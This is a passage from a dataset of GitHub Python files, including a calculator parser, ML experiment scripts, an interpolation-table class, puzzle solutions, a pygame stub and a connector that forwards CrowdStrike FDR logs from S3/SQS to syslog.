\"next\", cls(b)) or setattr(a.next, \"prev\", a) or a.next, s_iterable, fst)\n return fst\n\n\n@curry\ndef fmap(t, func):\n return lambda *args: func(*map(t, args))\n\n\ndef visit_bin_expr(func, seq: 'DoublyList[AstParser]'):\n def sort_by_func(e: 'DoublyList[Tokenizer]'):\n return op_priorities[e.content.string]\n\n functor = fmap(func)\n\n op_nodes = (each for each in seq if each.content.name is not UNameEnum.factor)\n op_nodes: DoublyList[Tokenizer] = sorted(op_nodes, key=sort_by_func, reverse=True)\n\n for each in op_nodes:\n bin_expr = functor(op_func[each.content.string])(each.prev.content, each.next.content)\n each.content = bin_expr\n try:\n each.prev.prev.next = each\n each.prev = each.prev.prev\n except AttributeError:\n pass\n\n try:\n each.next.next.prev = each\n each.next = each.next.next\n except AttributeError:\n pass\n\n each: DoublyList[Real]\n return each.content\n\n\ndef repl():\n while True:\n try:\n inp = input('my_calc:: ')\n print(ast_for_arith(parse(inp)))\n except KeyboardInterrupt:\n print('\\nbye')\n import sys\n sys.exit(0)\n\n\nif __name__ == '__main__':\n repl()\n","repo_name":"thautwarm/ebnfparser-dev-notes","sub_path":"code_examples/calc/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5211811530","text":"import os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nfrom adapters.tip_adapter import ClipTipAdapter\n\n\n# import for clearml\nimport clip\nimport torch\nimport torchvision\nimport numpy as np\nimport sklearn\nimport tqdm\n\nrun_clearml = False\n\ncifar_templates = [\n 'a photo of a {}.',\n 'a blurry photo of a {}.',\n 'a black and white photo of a {}.',\n 'a low contrast photo of a {}.',\n 'a high contrast photo of a {}.',\n 'a bad photo of a {}.',\n 'a good photo of a {}.',\n 'a photo of a small {}.',\n 'a photo of a big {}.',\n 'a photo of the {}.',\n 'a blurry photo of the {}.',\n 'a black and white photo of the {}.',\n 'a low contrast photo of the {}.',\n 'a high contrast photo of the {}.',\n 'a bad photo of the {}.',\n 'a good photo of the {}.',\n 'a photo of the small {}.',\n 'a photo of the big {}.',\n]\n\n\nclass OodCifar10(torchvision.datasets.CIFAR10):\n def __init__(self, data_path, transform, train, templates=None):\n super(OodCifar10, self).__init__(root=data_path,\n transform=transform,\n train=train,\n download=True\n )\n self.targets = np.array(self.targets)\n self.templates = templates if templates else cifar_templates\n self.idx_to_class = {value: key for (key, value) in self.class_to_idx.items()}\n\n\ndef main():\n dataset = OodCifar10\n\n tip_adapter = ClipTipAdapter(dataset=dataset,\n kshots=16,\n augment_epochs=1,\n lr=0.001,\n eps=1e-4)\n\n result = tip_adapter.compare()\n return result\n\n\nif __name__ == '__main__':\n\n if run_clearml:\n from clearml import Task\n print(\"running clearml\")\n task = Task.init(project_name=\"ma_fmeyer\", task_name=\"tip adapter testing\")\n task.execute_remotely('5e62040adb57476ea12e8593fa612186')\n\n main()\n","repo_name":"gitfabianmeyer/ood-detection","sub_path":"run_tip_single_set_copy.py","file_name":"run_tip_single_set_copy.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71233482702","text":"#!python3\n\n\"\"\"\nA class for keeping a table of y-values vs. 
x-values\n and interpolating y-values for other x-values.\n\n@author Erel Segal-Halevi\n@since 2017-10\n\"\"\"\n\n\nimport os\nfrom typing import Callable\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport ironing\nfrom log_progress import log_progress\n\n\nclass InterpolationTable:\n\t\"\"\"\n\tContains a table of x-values and corresponding y-values.\n\tCan be used for interpolating y-values for other x-values.\n\tCan be saved/loaded to/from a file.\n\tNOTE: the class assumes that the function should be weakly-increasing.\n\t\"\"\"\n\n\tdef __init__(self, xName:str, yName:str, fileName:str, valueCalculationFunction:Callable):\n\t\tself.xValues = None # 1-dimensional array\n\t\tself.yValuesSamples = None # 2-dimensional array. Every sample is a row; every x-value is a column.\n\t\tself.xName = xName\n\t\tself.yName = yName\n\t\tself.fileName = fileName\n\t\tself.valueCalculationFunction = valueCalculationFunction\n\t\tself.regressionFunction = None\n\t\tself.regressionString = \"\"\n\n\tdef numOfSamples(self):\n\t\treturn 0 if self.yValuesSamples is None else len(self.yValuesSamples)\n\n\tdef calculateTable(self, xValues: list, numOfSamples:int = 1, recreateAllSamples:bool = False, numXValues:int = None, saveAfterEachSample:bool=False):\n\t\t\"\"\"\n\t\tNumerically calculate a table that gives, for each channel-capacity, its optimal reset-radius.\n\t\tThis table is used for interpolation by self.getOptimalResetRadius.\n\n\t\ttheFunction: gets an x-value and returns the corresponding y-value.\n\t\tnumOfSamples: how many samples to run (the results will be averaged).\n\t\trecreateAllSamples: if True, all numOfSamples samples will be re-calculated. If False, only the missing will be re-calculated.\n\t\t\"\"\"\n\t\tif recreateAllSamples:\n\t\t\tself.yValuesSamples = np.zeros((0, len(xValues)))\n\t\t\tnumOfExistingSamples = 0\n\t\telse:\n\t\t\tnumOfExistingSamples = 0 if self.yValuesSamples is None else len(self.yValuesSamples)\n\t\t\tif numOfExistingSamples >= numOfSamples:\n\t\t\t\treturn\n\t\tif numXValues is None:\n\t\t\tnumXValues = len(xValues)\n\t\tself.xValues = xValues\n\t\tfor iSample in range(numOfExistingSamples, numOfSamples):\n\t\t\tyValues = []\n\t\t\tfor xValue in log_progress(xValues, every=1, name=self.xName, size=numXValues):\n\t\t\t\tyValue = self.valueCalculationFunction(xValue, iSample)\n\t\t\t\tyValues.append(yValue)\n\t\t\tyValuesArray = np.asarray(yValues)\n\t\t\tself.yValuesSamples = np.r_[self.yValuesSamples, [yValuesArray]] # add row; see https://stackoverflow.com/a/8505658/827927\n\t\t\tif saveAfterEachSample:\n\t\t\t\tself.saveTable()\n\t\tself.smoothTable()\n\n\tdef calculateRegressionFunction(self, type:str):\n\t\t\"\"\"\n\t\t:param type: \"linlin\" or \"linlin2\" or \"loglog\"\n\t\t\"\"\"\n\t\tif self.xValues is None or self.yValuesSmoothed is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\txValues = self.xValues\n\t\t# yValues = self.yValuesSmoothed\n\t\tyValues = self.yValuesAverage\n\t\t# yValues = [item for sublist in self.yValuesSamples for item in sublist] # flatten values in all samples\n\t\tif type=='linlin':\n\t\t\tregressionCoeffs = np.polyfit(xValues, yValues, 1)\n\t\t\tself.regressionString = \"{} ~ {:.2e} {} + {:.2e}\".format(self.yName, regressionCoeffs[0], self.xName, regressionCoeffs[1])\n\t\t\tself.regressionFunction = lambda x: regressionCoeffs[0]*x + regressionCoeffs[1]\n\t\telif type=='linlin2':\n\t\t\tregressionCoeffs = np.polyfit(xValues, yValues, 2)\n\t\t\tself.regressionString = \"{} ~ {:.2e} {}^2 + {:.2e} {} 
+ {:.2e}\".format(self.yName, regressionCoeffs[0], self.xName, regressionCoeffs[1], self.xName, regressionCoeffs[2])\n\t\t\tself.regressionFunction = lambda x: regressionCoeffs[0]*x**2 + regressionCoeffs[1]*x + regressionCoeffs[2]\n\t\telif type=='loglog':\n\t\t\tregressionCoeffs = np.polyfit(np.log(xValues), np.log(yValues), 1)\n\t\t\tself.regressionString = \"ln({}) ~ {:.2e} ln({}) + {:.2e}\".format(self.yName, regressionCoeffs[0], self.xName, regressionCoeffs[1])\n\t\t\tself.regressionFunction = lambda x: np.exp(regressionCoeffs[0]*np.log(x) + regressionCoeffs[1])\n\t\telse:\n\t\t\traise Exception(\"type should be linlin or loglog\")\n\n\tdef smoothTable(self):\n\t\tif self.yValuesSamples is not None and len(self.yValuesSamples)>0:\n\t\t\tself.yValuesAverage = np.mean(self.yValuesSamples[:,:],axis=0)\n\t\t\tself.yValuesSmoothed = ironing.iron(self.yValuesAverage)\n\n\tdef getYValue(self, xValue:float):\n\t\tif self.xValues is None or self.yValuesSmoothed is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\tif self.regressionFunction is None:\n\t\t\treturn np.interp(xValue, self.xValues, self.yValuesSmoothed)\n\t\telse:\n\t\t\treturn self.regressionFunction(xValue)\n\n\tdef plotTable(self, xValues:list=None, numOfSamplesToShow:int=None, plotAverage=True, plotMonotone=False):\n\t\tif self.xValues is None or self.yValuesSamples is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\tif xValues is None:\n\t\t\txValues = self.xValues\n\t\tif numOfSamplesToShow is None:\n\t\t\tnumOfSamplesToShow = len(self.yValuesSamples)\n\t\telse:\n\t\t\tnumOfSamplesToShow = min(numOfSamplesToShow, len(self.yValuesSamples))\n\t\tf, ax = plt.subplots(2, 1, sharex=True, figsize=(8,8))\n\t\tfor i in range(0, numOfSamplesToShow):\n\t\t\tax[0].plot(xValues, self.yValuesSamples[i], 'g--')\n\t\tax[0].plot(xValues, self.yValuesAverage, 'b', label=\"Average of {} samples\".format(len(self.yValuesSamples)))\n\t\tax[0].set_ylabel(\"Exact \"+self.yName)\n\t\tax[0].legend(loc=0)\n\t\tax[0].set_xlabel(self.xName)\n\t\tif plotAverage:\n\t\t\tax[1].plot(xValues,self.yValuesAverage,'b',label='Average')\n\t\tif plotMonotone:\n\t\t\tax[1].plot(xValues,self.yValuesSmoothed,'r.',label='Monotone')\n\t\tax[1].set_ylabel(\"Approximate \"+self.yName)\n\t\txValuesForInterpolation = np.concatenate( (xValues/2, xValues/2+xValues[-1]/2) )\n\t\tax[1].plot(xValuesForInterpolation, [self.getYValue(x) for x in xValuesForInterpolation],'g',linewidth=3.0,label='Regression')\n\t\tax[1].legend(loc=0)\n\t\tax[1].set_xlabel(self.regressionString)\n\t\treturn ax\n\n\tdef plotTableLogLog(self):\n\t\tif self.xValues is None or self.yValuesSamples is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\tf, ax = plt.subplots(3, 2, sharex='col', sharey=False, figsize=(12,12))\n\t\tfor i in range(0,len(self.yValuesSamples)):\n\t\t\tax[0][0].plot(self.xValues, self.yValuesSamples[i], 'g--')\n\t\tax[0][0].plot(self.xValues, self.yValuesAverage, 'b', label=\"Average of {} samples\".format(len(self.yValuesSamples)))\n\t\tax[0][0].set_ylabel(\"Optimal \"+self.yName)\n\t\tax[0][0].legend(loc=0)\n\t\tax[1][0].plot(self.xValues,self.yValuesSmoothed)\n\t\tax[1][0].set_ylabel(\"Monotone \"+self.yName)\n\t\txValuesForInterpolation = np.concatenate( (self.xValues/2, self.xValues/2+self.xValues[-1]/2) )\n\t\tax[2][0].plot(xValuesForInterpolation, [self.getYValue(x) for x in xValuesForInterpolation])\n\t\tax[2][0].set_ylabel(\"Interpolated \"+self.yName)\n\t\tax[2][0].set_xlabel(self.xName)\n\n\t\tfor i in 
range(0,len(self.yValuesSamples)):\n\t\t\tax[0][1].loglog(self.xValues, self.yValuesSamples[i], 'g--')\n\t\tax[0][1].loglog(self.xValues, self.yValuesAverage, 'b', label=\"Average of {} samples\".format(len(self.yValuesSamples)))\n\t\tax[0][1].set_ylabel(\"Optimal \"+self.yName)\n\t\tax[0][1].legend(loc=0)\n\n\t\tax[1][1].loglog(self.xValues,self.yValuesSmoothed)\n\t\tloglogRegression = np.polyfit(np.log(self.xValues), np.log(self.yValuesSmoothed), 1)\n\t\tloglogRegressionString = \"ln({}) = {:.2f} ln({}) + {:.2f}\".format(self.yName, loglogRegression[0], self.xName, loglogRegression[1])\n\t\tax[1][1].set_ylabel(\"Monotone \"+self.yName)\n\t\tax[1][1].set_xlabel(loglogRegressionString)\n\n\t\txValuesForInterpolation = np.concatenate( (self.xValues/2, self.xValues/2+self.xValues[-1]/2) )\n\t\tax[2][1].loglog(xValuesForInterpolation, [self.getYValue(x) for x in xValuesForInterpolation])\n\t\tax[2][1].set_ylabel(\"Interpolated \"+self.yName)\n\t\tax[2][1].set_xlabel(self.xName)\n\n\n\tdef saveTable(self):\n\t\tif self.xValues is None or self.yValuesSamples is None:\n\t\t\tprint(\"WARNING: tables of \"+self.yName+\" vs \"+self.xName+\" not calculated yet\")\n\t\t\treturn\n\t\tnp.savez(self.fileName,\n\t\t\txValues=self.xValues,\n\t\t\tyValuesSamples=self.yValuesSamples,\n\t\t\t)\n\n\tdef loadTable(self,regressionType=None):\n\t\tif not os.path.isfile(self.fileName):\n\t\t\tprint(\"WARNING: file \"+self.fileName+\" does not exist\")\n\t\t\treturn\n\t\tdata = np.load(self.fileName)\n\t\tarrays = {name:value for (name,value) in data.items()}\n\t\tself.xValues = arrays.get('xValues')\n\t\tself.yValuesSamples = arrays.get('yValuesSamples')\n\t\tself.smoothTable()\n\t\tif regressionType:\n\t\t\tself.calculateRegressionFunction(type=regressionType)\n\n\tdef setTable(self, xValues, yValuesSamples):\n\t\tself.xValues = xValues\n\t\tself.yValuesSamples = yValuesSamples\n\t\tself.smoothTable()\n\n\tdef isTableCalculated(self):\n\t\treturn self.xValues is not None and self.yValuesSamples is not None\n\n\n\nif __name__ == \"__main__\":\n\ttable = InterpolationTable(xName=\"x\", yName=\"y\", fileName=\"interpolation-tables/InterpolationTableDemo.npz\",\n\t\tvalueCalculationFunction=lambda x,iSample:np.sin(x)+np.random.random())\n\tfilename=\"InterpolationTableDemo.npz\"\n\ttable.loadTable()\n\tprint(\"current num of samples: \", table.numOfSamples())\n\ttable.calculateTable(xValues=np.linspace(0,10,10000), numOfSamples=30, recreateAllSamples=False, saveAfterEachSample=True)\n\ttable.plotTable(numOfSamplesToShow=100); plt.show()\n\ttable.saveTable()\n","repo_name":"erelsgl/bitcoin-simulations","sub_path":"InterpolationTable.py","file_name":"InterpolationTable.py","file_ext":"py","file_size_in_byte":9073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"34897233900","text":"import numpy as np\nfrom train_ann import *\n\nx_m = 1000 # number of samples\nx = np.random.default_rng().uniform(-5, 5, x_m)\ny = np.random.default_rng().uniform(-5, 5, x_m)\nX = np.array((x, y)).T\n\nF = []\nfor i in range(0, x_m, 1):\n    f = np.array([[100 * (y[i] - x[i] ** 2) ** 2 + (1 - x[i]) ** 2, x[i]*y[i]]])\n    F.append(*f.reshape(1,2))\nF = np.array(F)\nif f.ndim==1:\n    F = F.reshape(-1, 1)\n\nmodel = Model(X.shape[1],F.shape[1])\nANN = train_ann(model, X, F, learning_rate=1e-3, plot=False)\n\n\nys = 
ANN.predict(X)\n\n\nprint('2')\n","repo_name":"panos108/Model-Predictive-Control-for-Batch-and-Continuous","sub_path":"train_example.py","file_name":"train_example.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"37778971863","text":"# not ready yet, I have only just started the project\r\nimport pygame as pyg\r\nFPS = 60\r\nclock = pyg.time.Clock()\r\nfrom pygame.locals import *\r\n\r\npyg.init()\r\n\r\nWINDOW_SIZE = [800, 600]\r\nscreen = pyg.display.set_mode(WINDOW_SIZE, RESIZABLE)\r\n\r\n\r\nclass Game:\r\n    def __init__(self):\r\n        COLOR_INACTIVE = pyg.Color('lightskyblue3')\r\n        COLOR_ACTIVE = pyg.Color('dodgerblue2')\r\n        fonte = pyg.font.SysFont('consolas', 50)\r\n        digitado = ['']\r\n        size_max = 200\r\n        class InputBox:\r\n            def __init__(self, x, y, w, h, text=''):\r\n                self.rect = pyg.Rect(x, y, w, h)\r\n                self.color = COLOR_ACTIVE\r\n                self.text = text\r\n                self.txt_surface = fonte.render(text, True, self.color)\r\n                self.ativo = True\r\n\r\n            def handle_event(self, event):\r\n                if event.type == pyg.MOUSEBUTTONDOWN:\r\n                    self.ativo = True\r\n                self.color = COLOR_ACTIVE if self.ativo else COLOR_INACTIVE\r\n                if event.type == KEYDOWN:\r\n                    if self.ativo:\r\n                        if event.key == K_RETURN:\r\n                            digitado[0] = self.text\r\n                            self.text = ''\r\n                        elif event.key == K_BACKSPACE:\r\n                            self.text = self.text[:-1]\r\n                        else:\r\n                            self.text += event.unicode\r\n                        self.txt_surface = fonte.render(self.text, True, self.color)\r\n\r\n            def update(self):\r\n                width = max(size_max, self.txt_surface.get_width() + 10)\r\n                self.rect.w = width\r\n\r\n            def draw(self, scr):\r\n                scr.blit(self.txt_surface, (self.rect.x + 5, self.rect.y + 5))\r\n                pyg.draw.rect(screen, self.color, self.rect, 2)\r\n\r\n        def update():\r\n            clock.tick(FPS)\r\n            for e in pyg.event.get():\r\n                if e.type == QUIT or e.type == KEYDOWN and e.key == K_ESCAPE:\r\n                    pyg.quit()\r\n\r\n        def render():\r\n            screen.fill((0, 0, 10))\r\n\r\n        while True:\r\n            try:\r\n                update()\r\n                render()\r\n                pyg.display.update()\r\n            except pyg.error:\r\n                break\r\n\r\n\r\nif __name__ == '__main__':\r\n    Game()\r\n    exit()\r\n","repo_name":"erikfritas/escola","sub_path":"com interface/fisica/forcaEletrica.py","file_name":"forcaEletrica.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"34651072000","text":"from collections import deque\n\nN, M = map(int, input().split())\nboard = []\nfor _ in range(N):\n    board.append(input())\n\nred = blue = goal = tuple()\nfor y in range(N):\n    for x in range(M):\n        if board[y][x] == 'R':\n            red = (y, x)\n        elif board[y][x] == 'B':\n            blue = (y, x)\n        elif board[y][x] == 'O':\n            goal = (y, x)\nQ = deque()\nvisit = [[0] * M for _ in range(N)]\nQ.append(red)\nvisit[red[0]][red[1]] = 1\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\n\nd = []\ncnt = 0\nwhile Q:\n    y, x = Q.popleft()\n    if y == goal[0] and x == goal[1]:\n        print(visit[y][x]-1)\n        print(cnt)\n        break\n\n    for i in range(4):\n        ty = y + dy[i]\n        tx = x + dx[i]\n        if ty < 0 or ty > N-1 or tx < 0 or tx > M-1:\n            continue\n        if (board[ty][tx] == '.' 
or board[ty][tx] == 'O') and visit[ty][tx] == 0:\n\n if not d:\n d.append(i)\n elif d[-1] != i:\n d.append(i)\n visit[ty][tx] = visit[y][x] + 1\n Q.append((ty, tx))\n\nfor z in range(N):\n print(visit[z])\nprint(d)","repo_name":"potomatoo/TIL","sub_path":"Baekjoon/boj_13460_구슬탈출2.py","file_name":"boj_13460_구슬탈출2.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40756562371","text":"#!/usr/bin/env python3\n\nimport sys,os,getopt\nimport traceback\nimport os\nimport fcntl\nimport json\nimport requests\nimport time\nimport re\nimport boto3\nimport gzip\nimport datetime\n\nfrom six import PY2\n\nif PY2:\n get_unicode_string = unicode\nelse:\n get_unicode_string = str\n\nsys.path.insert(0, './ds-integration')\nfrom DefenseStorm import DefenseStorm\n\nfrom html.parser import HTMLParser\n\nclass integration(object):\n\n\n JSON_field_mappings = {\n 'aid' : 'device_id',\n 'aip' : 'external_ip',\n 'ContextProcessId' : 'process_id',\n 'ContextThreadId' : 'thread_id',\n 'event_platform' : 'os_type',\n 'ComputerName' : 'client_hostname',\n 'event_simpleName' : 'category',\n 'FileName' : 'file_name',\n 'FilePath' : 'file_path',\n 'CommandLine' : 'command_line',\n 'ImageFileName' : 'image',\n 'Name' : 'event_name',\n 'CID' : 'log_id',\n 'TargetFileName' : 'target_filename',\n }\n\n def get_S3_files(self, sqs_msg):\n if not os.path.isdir('datadir'):\n os.mkdir('datadir')\n if len(os.listdir('datadir')) >= 1:\n self.ds.log('WARNING', \"datadir/ is not empty. A previous run might have failed. Cleaning Up\")\n file_list = os.listdir('datadir')\n for thisfile in file_list:\n self.ds.log('WARNING', \"Removing datadir/\" + thisfile)\n try:\n os.remove('datadir/' + thisfile)\n except Exception as e:\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n self.ds.log('ERROR', \"Cleanup datadir/ error for file \" + thisfile)\n pass\n\n my_bucket = self.s3.Bucket(sqs_msg['bucket'])\n obj_list = my_bucket.objects.filter(Prefix = sqs_msg['pathPrefix'])\n Found = False\n file_list = []\n for b_obj in obj_list:\n file_list.append(b_obj.key)\n if '_SUCCESS' in b_obj.key:\n Found = True\n if not Found:\n return None\n self.ds.log('INFO', \"Downloading files: %s\" %(str(file_list)))\n downloaded_files = []\n for filename in file_list:\n if '_SUCCESS' in filename:\n continue\n self.ds.log('INFO', \"Downloading file: %s\" %(str(filename)))\n my_bucket.download_file(filename, 'datadir/' + filename.replace('/','_'))\n downloaded_files.append(filename.replace('/','_'))\n return downloaded_files\n\n\n def get_SQS_message(self):\n try:\n response = self.sqs.receive_message(\n QueueUrl=self.sqs_url,\n AttributeNames=[\n 'SentTimestamp'\n ],\n MaxNumberOfMessages=1,\n MessageAttributeNames=[\n 'All'\n ],\n VisibilityTimeout=0,\n WaitTimeSeconds=0\n )\n except Exception as e:\n traceback.print_exc()\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n return None, None, None\n\n notification_time = response\n if 'Messages' not in response.keys():\n self.ds.log('INFO', \"No more SQS Notifications to handle\")\n return None, None, None\n\n msg_count = len(response['Messages'])\n if msg_count < 1:\n self.ds.log('INFO', \"No SQS Notifications to handle\")\n return None, None, None\n if msg_count > 1:\n self.ds.log('ERROR', \"Should never get more than one message from SQS\")\n return None, None, None\n message = response['Messages'][0]\n msg_body = json.loads(message['Body'])\n return message['ReceiptHandle'], 
message['MessageId'], msg_body\n\n def handle_local_files(self, local_files):\n for thisfile in local_files:\n self.ds.log('INFO', \"Processing file %s\" %(thisfile))\n f_name = 'datadir/' + thisfile\n if 'managedassets' in thisfile:\n category = 'managedassets'\n elif 'aid_master' in thisfile:\n category = 'aid_master'\n elif 'notmanaged' in thisfile:\n category = 'notmanaged'\n else:\n category = None\n try:\n with gzip.open(f_name) as f:\n for line in f:\n event = json.loads(str(line, 'utf-8'))\n if category != None:\n event['category'] = category\n event['message'] = category + ' event'\n elif 'ComputerName' in event.keys() and 'event_simpleName' in event.keys():\n\n event['message'] = event['ComputerName'] + ' - ' + event['event_simpleName']\n elif 'event_simpleName' in event.keys():\n event['message'] = event['event_simpleName'] + ' - Crowdstrike FDR Data Event'\n else:\n event['message'] = 'Crowdstrike FDR Data Event'\n if 'ContextTimeStamp' in event.keys():\n if event['ContextTimeStamp'] != '':\n self.ds.log(\"INFO\", 'ContextTimeStamp: \"%s\"' %str(event['ContextTimeStamp']))\n event['receive_time'] = event['timestamp']\n event['timestamp'] = event['ContextTimeStamp']\n #del event['ContextTimeStamp']\n if 'timestamp' in event.keys():\n if event['timestamp'] == '':\n event['cs_timestamp'] = event['timestamp']\n del event['timestamp']\n if 'ScriptContentBytes' in event.keys():\n event['ScriptContentBytes'] = \"Bytes Removed\"\n self.ds.writeJSONEvent(event, JSON_field_mappings = self.JSON_field_mappings)\n except Exception as e:\n self.ds.log('ERROR', \"Exception: Error handling file %s: %s\" %(f_name, e))\n return False\n os.remove(f_name)\n return True\n\n def delete_SQS_message(self, sqs_rh):\n #return True\n self.ds.log('INFO', \"Deleting SQS Notification: %s\" %(sqs_rh))\n if self.testing:\n self.ds.log('INFO', \"Skipping deleting of SQS Notification.\")\n return True\n try:\n self.sqs.delete_message(QueueUrl = self.sqs_url, ReceiptHandle = sqs_rh)\n except Exception as e:\n self.ds.log('ERROR', \"Exception: Failed to delete SQS Notification: %s - %s\" %(sqs_rh, e))\n return False\n return True\n\n def cs_main(self): \n\n self.s3_key = self.ds.config_get('crowdstrike', 's3_key')\n self.s3_secret = self.ds.config_get('crowdstrike', 's3_secret')\n self.sqs_url = self.ds.config_get('crowdstrike', 'sqs_url')\n self.s3_idenfifier = self.ds.config_get('crowdstrike', 's3_identifier')\n self.history = self.ds.config_get('crowdstrike', 'history')\n\n try:\n self.sqs = boto3.client('sqs', region_name='us-west-1', aws_access_key_id=self.s3_key, aws_secret_access_key=self.s3_secret)\n self.s3 = boto3.resource('s3', aws_access_key_id=self.s3_key, aws_secret_access_key=self.s3_secret)\n except Exception as e:\n traceback.print_exc()\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n return\n\n sqs_rh, msg_id, sqs_msg = self.get_SQS_message()\n\n while sqs_rh != None:\n self.ds.log('INFO', \"Processing Notification: %s\" %(msg_id))\n self.ds.log('INFO', \"Processing Notification Message: %s\" %(sqs_msg))\n notification_time = int(sqs_msg['timestamp']) / 1000\n current_epoch = time.time()\n self.ds.log('INFO', \"Notification: %s, Timestamp %s\" %(msg_id, datetime.datetime.utcfromtimestamp(int(sqs_msg['timestamp']/1000)).isoformat() + 'Z'))\n if (current_epoch - notification_time) > (int(self.history) * 60 * 60):\n self.ds.log('INFO', \"Message %s older than %s hours, deleting from SQS.\" %(msg_id, self.history))\n if not self.delete_SQS_message(sqs_rh):\n self.ds.log('ERROR', 
\"Deleting SQS Notification - %s\" %(sqs_rh))\n return\n else:\n self.ds.log('INFO', \"Downloading files for notification: %s\" %(msg_id))\n local_files = self.get_S3_files(sqs_msg)\n if local_files == None:\n self.ds.log('ERROR', \"Error getting local files. Ending Run.\")\n return\n if not self.handle_local_files(local_files):\n self.ds.log('ERROR', \"Error handling downloaded files. Exiting.\")\n return\n if not self.delete_SQS_message(sqs_rh):\n self.ds.log('ERROR', \"Deleting old SQS Notification - %s\" %(sqs_rh))\n return\n sqs_rh, msg_id, sqs_msg = self.get_SQS_message()\n \n\n def run(self):\n try:\n pid_file = self.ds.config_get('crowdstrike', 'pid_file')\n fp = open(pid_file, 'w')\n try:\n fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n self.ds.log('ERROR', \"An instance of cb defense syslog connector is already running\")\n # another instance is running\n sys.exit(0)\n self.cs_main()\n except Exception as e:\n traceback.print_exc()\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n return\n \n def usage(self):\n print\n print(os.path.basename(__file__))\n print\n print(' No Options: Run a normal cycle')\n print\n print(' -t Testing mode. Do all the work but do not send events to GRID via ')\n print(' syslog Local7. Instead write the events to file \\'output.TIMESTAMP\\'')\n print(' in the current directory')\n print\n print(' -l Log to stdout instead of syslog Local6')\n print\n \n def __init__(self, argv):\n\n self.testing = False\n self.send_syslog = True\n self.ds = None\n \n try:\n opts, args = getopt.getopt(argv,\"htnld:\",[\"datedir=\"])\n except getopt.GetoptError:\n self.usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n self.usage()\n sys.exit()\n elif opt in (\"-t\"):\n self.testing = True\n elif opt in (\"-l\"):\n self.send_syslog = False\n \n try:\n self.ds = DefenseStorm('crowdstrikeFDREventLogs', testing=self.testing, send_syslog = self.send_syslog)\n except Exception as e:\n traceback.print_exc()\n try:\n self.ds.log('ERROR', 'ERROR: ' + str(e))\n except:\n pass\n\n\nif __name__ == \"__main__\":\n i = integration(sys.argv[1:]) \n i.run()\n","repo_name":"DefenseStorm/crowdstrikeFDREventLogs","sub_path":"crowdstrikeFDREventLogs.py","file_name":"crowdstrikeFDREventLogs.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1950103285","text":"\n######################################################################################################################\nclass Node:\n def __init__(self, x, y, elevation) -> None:\n self.x = x\n self.y = y\n self.parent: Node = None # type: ignore\n self.g_cost = 0\n self.h_cost = 0\n \n def get_f_cost(self):\n return self.g_cost + self.h_cost\n\n def get_distance(self, node):\n # return ((self.y - node.y)**2 + (self.x - node.x)**2)**(1/2)\n # return abs(self.y - node.y) + abs(self.x - node.x)\n raise NotImplementedError\n\n def get_neighbors(self, nodes):\n neighbors = []\n directions = [(1,0), (-1,0), (0,1),(0,-1)]\n for dx, dy in directions:\n new_x, new_y = self.x + dx, self.y + dy\n \n if 0 <= new_x < len(nodes[0]) and 0 <= new_y < len(nodes):\n neighbor = nodes[new_y][new_x]\n neighbors.append(neighbor)\n raise NotImplementedError\n return neighbors\n\n\ndef a_star(start: Node, end: Node, nodes:list[list[Node]]):\n open_nodes: list[Node] = [start]\n closed_nodes: list[Node]= []\n \n while open_nodes:\n current: Node = min(open_nodes, key=lambda n: (n.get_f_cost(), n.g_cost))\n 
open_nodes.remove(current)\n closed_nodes.append(current) \n if current == end:\n print(\"Found it!\")\n return\n \n neighbors: list[Node] = current.get_neighbors(nodes)\n \n for neighbor in neighbors:\n if neighbor in closed_nodes:\n continue\n \n movement_cost_to_neighbor = current.g_cost + current.get_distance(neighbor)\n\n if (movement_cost_to_neighbor < neighbor.g_cost) or (neighbor not in open_nodes):\n neighbor.g_cost = movement_cost_to_neighbor\n neighbor.h_cost = neighbor.get_distance(end)\n neighbor.parent = current\n \n if neighbor not in open_nodes:\n open_nodes.append(neighbor)\n \n raise Exception(\"Could not find\")\n######################################################################################################################\ndef bubble_sort(lst):\n for i in range(len(lst) - 1):\n for j in range(len(lst) - 1 - i):\n if lst[j] > lst[j + 1]:\n lst[j], lst[j + 1] = lst[j + 1], lst[j]\n","repo_name":"Pasorra/adventofcode","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74938904141","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom __future__ import annotations\nfrom typing import Sequence, IO, Iterator\nimport collections\nimport os\nimport sys\nfrom dataclasses import dataclass\nimport json\nimport time\nimport subprocess\nimport tempfile\nimport numpy as np\nfrom numpy.typing import NDArray\nimport pandas as pd\nfrom scipy.sparse import csr_array, save_npz, load_npz\n\n\nclass AlleleMatrix:\n def __init__(self, 